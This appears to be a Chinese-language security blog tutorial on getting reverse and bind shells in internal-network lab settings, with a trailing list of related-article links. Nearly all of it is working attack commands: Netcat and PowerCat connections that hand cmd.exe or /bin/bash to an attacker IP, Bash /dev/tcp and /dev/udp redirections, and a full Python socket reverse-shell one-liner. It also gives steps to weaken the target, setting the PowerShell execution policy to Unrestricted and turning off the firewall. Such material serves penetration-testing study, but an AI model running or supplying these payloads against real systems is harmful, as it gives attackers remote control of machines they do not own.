内网安全:反弹shell

目录

一.Netcat反弹Shell

二.PowerCat反弹Shell

PowerCat和nc正向连接

PowerCat和nc反向连接

PowerCat和PowerCat反向连接

三.Bash反弹shell

[四.Python 反弹Shell](#四.Python 反弹Shell)


一.Netcat反弹Shell

在Windows容易被杀

介绍:

Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军刀。通NC可以进行端口扫描、反弹Shell、端口监听和文件传输等操作,常用参数如下
注意:这里需要关闭靶机的防火墙,做NC反弹的时候,前提你也经控制了对方电脑

正向反弹:

场景:攻击机器和靶机都是在公网上,都能互ping,这个时候可以用正向反弾

利用:

1.在靶机上运行:

nc -lvvp 1111 -e C:\Windows\System32\cmd.exe windows机器

nc -lvvp 1111 -e /bin/bash linux机器

这里以Linux作演示

2在攻击机上运行:

nc -v 靶机IP 1111

3.拿到shell

反向反弹:

实验前提:

攻击机器在公网上,靶机在内网里面,这时候需要靶机反向链接攻击机器,也就是反向反弹

利用:

1在攻击者机器运行:

nc -lvvp 1111 监听1111端口

2.在靶机上运行 (反弹到公网)

nc -e C:\Windows\System32\cmd.exe 攻击IP 1111 windos机器

nc -e /bin/bash 攻击IP 1111 linux机器

这里用Linux作演示

3.拿到反向的shell

二.PowerCat反弹Shell

和NC作用一样,只能用于Windows

介绍:可以无文件落地

PowerCat是一个powershell写的tcp/ip瑞士军刀,看一看成ncat的powershell的实现,然后里面也加入了众多好用的功能,如文件上传,smb协议支持,中继模式,生成payload,端口扫描等等。

利用:

1.导入模块:

Import-Module .\powercat.ps1

如果提示未能加载指定模块,则可能是权限问题,输入如下代码

Set-ExecutionPolicy Unrestricted

PowerCat和nc正向连接

1、靶机使用powercat执行以下命令:

powercat -l -p 8080 -e cmd.exe -v

2、攻击机使用nc执行以下命令:

nc -v 靶机IP 8080 -vv

3.成功反弹

PowerCat和nc反向连接

1、靶机使用powercat执行以下命令

powercat -c 攻击机IP -p 8888 -v -e cmd.exe

2、攻击机使用nc执行以下命令:

nc -l -p 8888 -vv

3.成功反弹

PowerCat和PowerCat反向连接

1、靶机使用powercat执行以下命令:

powercat -c 攻击机器IP -p 9999 -v -ep

2、攻击机使用powercat执行以下命令:

powercat -l -p 9999 -v

3.成功反弹

三.Bash反弹shell

介绍:传输层的隧道

** Shell也称为终端或壳,是人与内核之间的翻译官,而Bash则是Linux中默认使用的Shell**
** Bash 反弹Shell的命令如下:**

bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&1

bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&2

bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&1

bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&2

利用:

1、攻击机器使用nc执行监听命令**

nc -lvvp 9999 监听 TCP

nc -lup 9999 监听UDP (UDP不稳定)

2、实验靶机执行连接命令

bash -i >&/dev/tcp/攻击机器IP/9999 0>&1

3.成功反弹

四.Python 反弹Shell

利用:

1、攻击机器使用nc执行监听命令

nc -lvvp 1111 监听 TCP

2、实验靶机执行连接命令

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机器IP",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

3.成功反弹

相关推荐
EasyNVR4 小时前
NVR管理平台EasyNVR多个NVR同时管理:全方位安防监控视频融合云平台方案
安全·音视频·监控·视频监控
黑客Ash6 小时前
【D01】网络安全概论
网络·安全·web安全·php
阿龟在奔跑8 小时前
引用类型的局部变量线程安全问题分析——以多线程对方法局部变量List类型对象实例的add、remove操作为例
java·jvm·安全·list
.Ayang8 小时前
SSRF漏洞利用
网络·安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
.Ayang8 小时前
SSRF 漏洞全解析(概述、攻击流程、危害、挖掘与相关函数)
安全·web安全·网络安全·系统安全·网络攻击模型·安全威胁分析·安全架构
好想打kuo碎9 小时前
1、HCIP之RSTP协议与STP相关安全配置
网络·安全
周全全9 小时前
Spring Boot + Vue 基于 RSA 的用户身份认证加密机制实现
java·vue.js·spring boot·安全·php
Mr.Pascal10 小时前
刚学php序列化/反序列化遇到的坑(攻防世界:Web_php_unserialize)
开发语言·安全·web安全·php
风间琉璃""10 小时前
二进制与网络安全的关系
安全·机器学习·网络安全·逆向·二进制